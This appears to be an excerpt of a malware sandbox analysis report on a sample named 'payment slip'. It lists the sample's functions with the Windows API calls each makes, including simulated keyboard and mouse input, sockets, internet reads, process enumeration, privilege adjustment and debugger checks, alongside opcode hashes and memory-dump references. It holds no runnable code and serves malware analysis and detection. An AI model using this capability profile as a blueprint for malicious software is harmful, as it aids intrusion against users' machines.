                                        • Opcode ID: 757d876ba7a1672c5d124a1564fa9ec4a0987ce8b922f3b715f7804fc8c1840b
                                        • Instruction ID: 090d73cf2960befda32fbb480a62d5f7a3204a30c38a7741a450837f80c5f10f
                                        • Opcode Fuzzy Hash: 757d876ba7a1672c5d124a1564fa9ec4a0987ce8b922f3b715f7804fc8c1840b
                                        • Instruction Fuzzy Hash: 76317C710483459BD701EF64D8918EFB7ECAF92310F444A1EF4D5921A2EB20AA09DB63
                                        Function 0006E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: dccf7980e85fc352cc5bb8b6bf3a1730748c4acc3a51e9588a24f68ce14a75a6
                                        • Instruction ID: cb51005c52b24984d30575d61d7a292c269593a44ef73ec8cee98cf77b3e3851
                                        • Opcode Fuzzy Hash: dccf7980e85fc352cc5bb8b6bf3a1730748c4acc3a51e9588a24f68ce14a75a6
                                        • Instruction Fuzzy Hash: A5C24A71E086298FDB65CE28DD407EAB7F6EB48305F1441EAD84EE7241E774AE858F40
                                        Function 000A648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 000A64DC
                                        • CoInitialize.OLE32(00000000), ref: 000A6639
                                        • CoCreateInstance.OLE32(000CFCF8,00000000,00000001,000CFB68,?), ref: 000A6650
                                        • CoUninitialize.OLE32 ref: 000A68D4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                        • String ID: .lnk
                                        • API String ID: 886957087-24824748
                                        • Opcode ID: 85a9e434770a5cfe73a083f7105cd5b7a1e562b2a2a28f1903c0b739977b6aba
                                        • Instruction ID: a755369f84d5491f7ba026bce21061fa6cef6d1fa8dea5a07605ee30286083da
                                        • Opcode Fuzzy Hash: 85a9e434770a5cfe73a083f7105cd5b7a1e562b2a2a28f1903c0b739977b6aba
                                        • Instruction Fuzzy Hash: 13D16971508201AFD315EF64C881EABB7E8FF95304F04496DF5958B292EB71ED09CB92
                                        Function 000B22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetForegroundWindow.USER32(?,?,00000000), ref: 000B22E8
                                          • Part of subcall function 000AE4EC: GetWindowRect.USER32(?,?), ref: 000AE504
                                        • GetDesktopWindow.USER32 ref: 000B2312
                                        • GetWindowRect.USER32(00000000), ref: 000B2319
                                        • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 000B2355
                                        • GetCursorPos.USER32(?), ref: 000B2381
                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 000B23DF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                        • String ID:
                                        • API String ID: 2387181109-0
                                        • Opcode ID: af0c13d3516c59c39dc8a07e46c8df7d6a152df7543dc991a4739d95b2f98ae4
                                        • Instruction ID: f6961c7161b0a8e59cb3a3178754536a94e0950b047ac11fd4dab9a4df171e76
                                        • Opcode Fuzzy Hash: af0c13d3516c59c39dc8a07e46c8df7d6a152df7543dc991a4739d95b2f98ae4
                                        • Instruction Fuzzy Hash: 0731D072504315AFEB20DF54C849F9BB7E9FF88710F000A19F98997191DB35EA09CB92
                                        Function 000A9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 000A9B78
                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 000A9C8B
                                          • Part of subcall function 000A3874: GetInputState.USER32 ref: 000A38CB
                                          • Part of subcall function 000A3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000A3966
                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 000A9BA8
                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 000A9C75
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                        • String ID: *.*
                                        • API String ID: 1972594611-438819550
                                        • Opcode ID: 2a9ab52a96e27c9766b864a3a668931cc75a1175c9207f66271b8747d468495c
                                        • Instruction ID: f0e7e3bf6669153aa9e87861b77d67e6d30c823efee9c4c7c670f47e27be0657
                                        • Opcode Fuzzy Hash: 2a9ab52a96e27c9766b864a3a668931cc75a1175c9207f66271b8747d468495c
                                        • Instruction Fuzzy Hash: D4418271A0460A9FDF55DFA4CD85EEEBBF8EF06310F248155E905A6192EB309E84CF60
                                        Function 0004997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00049BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00049BB2
                                        • DefDlgProcW.USER32(?,?,?,?,?), ref: 00049A4E
                                        • GetSysColor.USER32(0000000F), ref: 00049B23
                                        • SetBkColor.GDI32(?,00000000), ref: 00049B36
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Color$LongProcWindow
                                        • String ID:
                                        • API String ID: 3131106179-0
                                        • Opcode ID: a8e1407385a1f1cd3a8cfb031838052f0cfdd623899ecae5d7d5ba635df00cde
                                        • Instruction ID: b5f28a87c658d71f3e75c828daae8e0a27486c26938d81607ab5dd5660d5276a
                                        • Opcode Fuzzy Hash: a8e1407385a1f1cd3a8cfb031838052f0cfdd623899ecae5d7d5ba635df00cde
                                        • Instruction Fuzzy Hash: 6EA13AF0108404BEE778BB2C8C48EBF36DDEB42350B254239F546D6A96CA25DD51C3BA
                                        Function 000B1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 000B307A
                                          • Part of subcall function 000B304E: _wcslen.LIBCMT ref: 000B309B
                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 000B185D
                                        • WSAGetLastError.WSOCK32 ref: 000B1884
                                        • bind.WSOCK32(00000000,?,00000010), ref: 000B18DB
                                        • WSAGetLastError.WSOCK32 ref: 000B18E6
                                        • closesocket.WSOCK32(00000000), ref: 000B1915
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                        • String ID:
                                        • API String ID: 1601658205-0
                                        • Opcode ID: 40ff1b4df0b54f7c9b132f88a4d4b12e7a419442868380c09bdaddbfd8c2d202
                                        • Instruction ID: c6f4e12f4ff35de1769cdcdb6063e8ee02445b1538d0e7144c7e13066591265a
                                        • Opcode Fuzzy Hash: 40ff1b4df0b54f7c9b132f88a4d4b12e7a419442868380c09bdaddbfd8c2d202
                                        • Instruction Fuzzy Hash: 9851C8B5A002006FEB11AF24C896FAA77E5AF44718F54845CFA09AF3D3CB75AD41CB91
                                        Function 000C1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: 95f001cff0582e79527e3d570a77c11ed1f02b19e56f4e3634f21f2ea063aa6f
                                        • Instruction ID: 37815dcc9fd267c7b3c9e21cf9a43a1d7ccac5de30655a3ee541405882940c53
                                        • Opcode Fuzzy Hash: 95f001cff0582e79527e3d570a77c11ed1f02b19e56f4e3634f21f2ea063aa6f
                                        • Instruction Fuzzy Hash: E52180317402105FE7208F1AC884FAE7BE5AF96315F19806CE84A8B352C775DC42CB90
                                        Function 00038060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                        • API String ID: 0-1546025612
                                        • Opcode ID: 5360c315b975f7f9af6a858f7f855b1406e170102fb34daacf62345b75c2098b
                                        • Instruction ID: b25fbd320c6b070b9df1cd388857161e1e38493ccc591583acc686938daf4fee
                                        • Opcode Fuzzy Hash: 5360c315b975f7f9af6a858f7f855b1406e170102fb34daacf62345b75c2098b
                                        • Instruction Fuzzy Hash: 75A28E70E0061ACBDF75CF58C8457EEB7B5BB44310F24C1A9E81AA7281EB759E81CB94
                                        Function 000BA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 000BA6AC
                                        • Process32FirstW.KERNEL32(00000000,?), ref: 000BA6BA
                                          • Part of subcall function 00039CB3: _wcslen.LIBCMT ref: 00039CBD
                                        • Process32NextW.KERNEL32(00000000,?), ref: 000BA79C
                                        • CloseHandle.KERNEL32(00000000), ref: 000BA7AB
                                          • Part of subcall function 0004CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00073303,?), ref: 0004CE8A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                        • String ID:
                                        • API String ID: 1991900642-0
                                        • Opcode ID: 746de001eb987e725a49451e584cd2c470c396f76d80b4aec5016cdcd7494f9e
                                        • Instruction ID: fb2b02e498359e295122868607da3899b03e45c1556c59e0dfb1d3081c8c549e
                                        • Opcode Fuzzy Hash: 746de001eb987e725a49451e584cd2c470c396f76d80b4aec5016cdcd7494f9e
                                        • Instruction Fuzzy Hash: E25160B1508301AFD710DF25C886EABBBE8FF89754F40892DF58997252EB71D904CB92
                                        Function 0009AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0009AAAC
                                        • SetKeyboardState.USER32(00000080), ref: 0009AAC8
                                        • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0009AB36
                                        • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0009AB88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: KeyboardState$InputMessagePostSend
                                        • String ID:
                                        • API String ID: 432972143-0
                                        • Opcode ID: 413c3b8dc0bbfe7896f76b16ad650a49fd0ed9d606e33eab5de01d63988b8613
                                        • Instruction ID: 709c7c5738494f01ddce2079a20e8e3f67f2b4d746163255f78d8cca070c6f3b
                                        • Opcode Fuzzy Hash: 413c3b8dc0bbfe7896f76b16ad650a49fd0ed9d606e33eab5de01d63988b8613
                                        • Instruction Fuzzy Hash: DA311830B40208AFFF358B69CC05BFE7BE6AB46320F04421AF585561D2D7749981E7E2
                                        Function 000ACE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 000ACE89
                                        • GetLastError.KERNEL32(?,00000000), ref: 000ACEEA
                                        • SetEvent.KERNEL32(?,?,00000000), ref: 000ACEFE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorEventFileInternetLastRead
                                        • String ID:
                                        • API String ID: 234945975-0
                                        • Opcode ID: 32c2ebaa0356c557d6ea67c0015e919e236d843818d641087938e2bd89aeea68
                                        • Instruction ID: 3195a8257061a49819b6bc06c5f455b35058b98fc0a8b5f2c08c483d3dd7451e
                                        • Opcode Fuzzy Hash: 32c2ebaa0356c557d6ea67c0015e919e236d843818d641087938e2bd89aeea68
                                        • Instruction Fuzzy Hash: B8218C71500705AFFB70DFA5C948FAB77F8EB41354F11442AE64692152E774EE08CB90
                                        Function 00098298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 000982AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID: ($|
                                        • API String ID: 1659193697-1631851259
                                        • Opcode ID: cb2adeef69724bbdf48ec01441a4061d05323803aadcfc02b678af5a0c75ea32
                                        • Instruction ID: b9b2d131ab02e176b89267a87dd80ec98be62cdd15f6605baf76ee4fac305ed8
                                        • Opcode Fuzzy Hash: cb2adeef69724bbdf48ec01441a4061d05323803aadcfc02b678af5a0c75ea32
                                        • Instruction Fuzzy Hash: A5323475A006059FCB28CF59C481AAAB7F0FF48710B15C46EE59ADB3A1EB70E981DB44
                                        Function 000A5C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindFirstFileW.KERNEL32(?,?), ref: 000A5CC1
                                        • FindNextFileW.KERNEL32(00000000,?), ref: 000A5D17
                                        • FindClose.KERNEL32(?), ref: 000A5D5F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Find$File$CloseFirstNext
                                        • String ID:
                                        • API String ID: 3541575487-0
                                        • Opcode ID: d8ccf1dfa0e9b4658a59147b11eb2652cc7aa57bdcca395a30bde0f6c2809133
                                        • Instruction ID: 30072ae2b5cbaf2666bdd022af64befb43fe4669595e3e3c7a16aa8fa64d1f33
                                        • Opcode Fuzzy Hash: d8ccf1dfa0e9b4658a59147b11eb2652cc7aa57bdcca395a30bde0f6c2809133
                                        • Instruction Fuzzy Hash: 9151AC74604A019FD724CF68C894E9AB7E4FF4A324F14855DE99A8B3A2CB30ED44CF91
                                        Function 00062622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • IsDebuggerPresent.KERNEL32 ref: 0006271A
                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00062724
                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00062731
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                        • String ID:
                                        • API String ID: 3906539128-0
                                        • Opcode ID: 4a1a4ab4a5ec66aec846782066cc4bb87d27381181e2aaf54f304a21d26400fe
                                        • Instruction ID: 97fe67eae1f1bf861ec7cdf1b585daeb4403c1a61fcc078f99034e33c714ee5e
                                        • Opcode Fuzzy Hash: 4a1a4ab4a5ec66aec846782066cc4bb87d27381181e2aaf54f304a21d26400fe
                                        • Instruction Fuzzy Hash: 0531C27490121CABDB21DF68DC89BDDBBF8AF08310F5041EAE80CA6261E7349F858F45
                                        Function 000A51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNEL32(00000001), ref: 000A51DA
                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 000A5238
                                        • SetErrorMode.KERNEL32(00000000), ref: 000A52A1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ErrorMode$DiskFreeSpace
                                        • String ID:
                                        • API String ID: 1682464887-0
                                        • Opcode ID: 823693bd8f85fb0911c9a5243253dc0ae7643f4fc770cc0a976467dfa79137a0
                                        • Instruction ID: ada5487d4ef2401ac32852814e356de12f197dee6c7c0395b476acd7886b6c7d
                                        • Opcode Fuzzy Hash: 823693bd8f85fb0911c9a5243253dc0ae7643f4fc770cc0a976467dfa79137a0
                                        • Instruction Fuzzy Hash: 6F312B75A00518DFEB00DF95D894FADBBB4FF49314F088099E809AB362DB35E855CB90
                                        Function 000916C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0004FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00050668
                                          • Part of subcall function 0004FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00050685
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0009170D
                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0009173A
                                        • GetLastError.KERNEL32 ref: 0009174A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                        • String ID:
                                        • API String ID: 577356006-0
                                        • Opcode ID: eff74e15e7e048d1ceabb0054a89ac493ef4e727c0be85529d47ed66f64947f9
                                        • Instruction ID: 6be384abe43934d8b310967a58f647a50f1ee88259a9995bf6e12eca073dbf8b
                                        • Opcode Fuzzy Hash: eff74e15e7e048d1ceabb0054a89ac493ef4e727c0be85529d47ed66f64947f9
                                        • Instruction Fuzzy Hash: CB1191B2904306AFE7189F54EC86DAAB7F9EF44714B24852EE05657251EB70BC428A24
                                        Function 0009D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0009D608
                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0009D645
                                        • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0009D650
